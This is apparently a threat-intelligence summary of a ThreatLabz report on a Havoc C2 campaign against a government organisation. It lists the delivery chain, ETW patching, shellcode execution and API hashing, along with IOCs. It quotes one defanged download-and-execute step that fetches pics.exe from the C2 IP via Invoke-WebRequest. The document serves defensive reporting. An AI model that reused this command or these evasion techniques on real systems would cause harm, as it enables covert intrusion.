Zscaler ThreatLabz researchers analyzed a government-targeting campaign that uses Havoc, an open-source post-exploitation C2 framework, to blend evasive techniques with multi-stage delivery and execution. The operation leverages a downloader chain, a signed shellcode loader, and a memory-mapped Demon DLL to run covert commands against the infected host. #HavocFramework #HavocDemon
Keypoints
- New threat campaign targets a government organization using the Havoc C2 framework.
- The Havoc Demon implant is delivered via a multi-stage chain starting with a ZIP archive (ZeroTwo.zip) containing character.scr and Untitled Document.docx.
- The downloader loads and decrypts a BAT script, downloads pics.exe (the Shellcode Loader), and then executes the payload in Temp; it also downloads images.jpg to conceal activity.
- Shellcode Loader is Microsoft-signed and disables ETW by patching EtwEventWrite, then AES-decrypts and executes shellcode via CreateThreadpoolWait.
- KaynLdr reflectively loads the Havoc Demon DLL using a modified DJB2 hash to resolve NTAPI addresses, and the Demon DLL uses Sleep Obfuscation and in-direct syscalls.
- Campaign infrastructure reveals domain ttwweatterarartgea.ga and an IP 146.190.48.229, including an open directory with logs and Metasploit screenshots.
- Sandbox coverage notes Win64.Backdoor.HavocC2 detection and highlights the broader need for robust defense.
MITRE Techniques
- [T1105] Ingress Tool Transfer – The final payload downloads from http[:]//146[.]190[.]48[.]229/pics.exe and is saved to Temp as seethe.exe and executed via Invoke-WebRequest. “downloads the final payload from http[:]//146[.]190[.]48[.]229/pics.exe and saves it as ‘seethe.exe’ in the Temp folder via Invoke-WebRequest and then executes it using ‘start seethe.exe’”.
- [T1059.001] PowerShell – Use of Invoke-WebRequest to fetch the final payload as part of the downloader chain. “downloads the final payload from http[:]//146[.]190[.]48[.]229/pics.exe … via Invoke-WebRequest”.
- [T1059.003] Windows Command Shell – The downloader BAT-based flow decrypts a Batch Script and writes/executed from Temp; BAT2EXE is used in the downloader binary. “The BAT2EXE argument can be seen in the downloader binary” and “the decrypted BAT Script upon execution … writes and executes the decrypted BAT script from the Temp folder”.
- [T1218.005] Signed Binary Proxy Execution: Signed Binary Proxy Execution – The Havoc Demon Loader is signed with a Microsoft digital certificate, enabling trusted-looking execution. “Shellcode Loader is signed using Microsoft’s Digital certificate”.
- [T1106] Native API – KaynLdr uses an API hashing routine to resolve virtual addresses of NTAPI functions by hashing the export table (modified DJB2). “the API Hashing routine … using modified DJB2 hashing algorithm”.
- [T1562.001] Impair Defenses: Disable or Modify Tools – ETW patching to disable Event Tracing for Windows. “patches the first 4 bytes of the EtwEventWrite … ETW will not be able to write any events thus disabling the ETW”.
- [T1055] Process Injection – Shellcode execution flow uses CreateThreadpoolWait and related APIs to execute decrypted shellcode. “Shellcode is executed via CreateThreadpoolWait … the callback function is set to the address of the shellcode”.
Indicators of Compromise
- [IP] 146.190.48.229 – used as C2/download host for final payloads. The infrastructure shows this IP in multiple references (e.g., pics.exe delivery and domain mapping).
- [Domain] ttwweatterarartgea.ga – domain hosting open directory with payloads, logs, and Metasploit screenshots; used for download and tracking data.
- [Hash] Pics.exe – 5be4e5115cdf225871a66899b7bc5861
- [Hash] image.exe – bfa5f1d8df27248d840d1d86121f2169
- [File name] ZeroTwo.zip – ZIP archive containing character.scr and Untitled Document.docx.
- [File name] character.scr – downloader component in the ZIP archive.
- [File name] Untitled Document.docx – document used as lure in the ZIP archive.
Read more: https://www.zscaler.com/blogs/security-research/havoc-across-cyberspace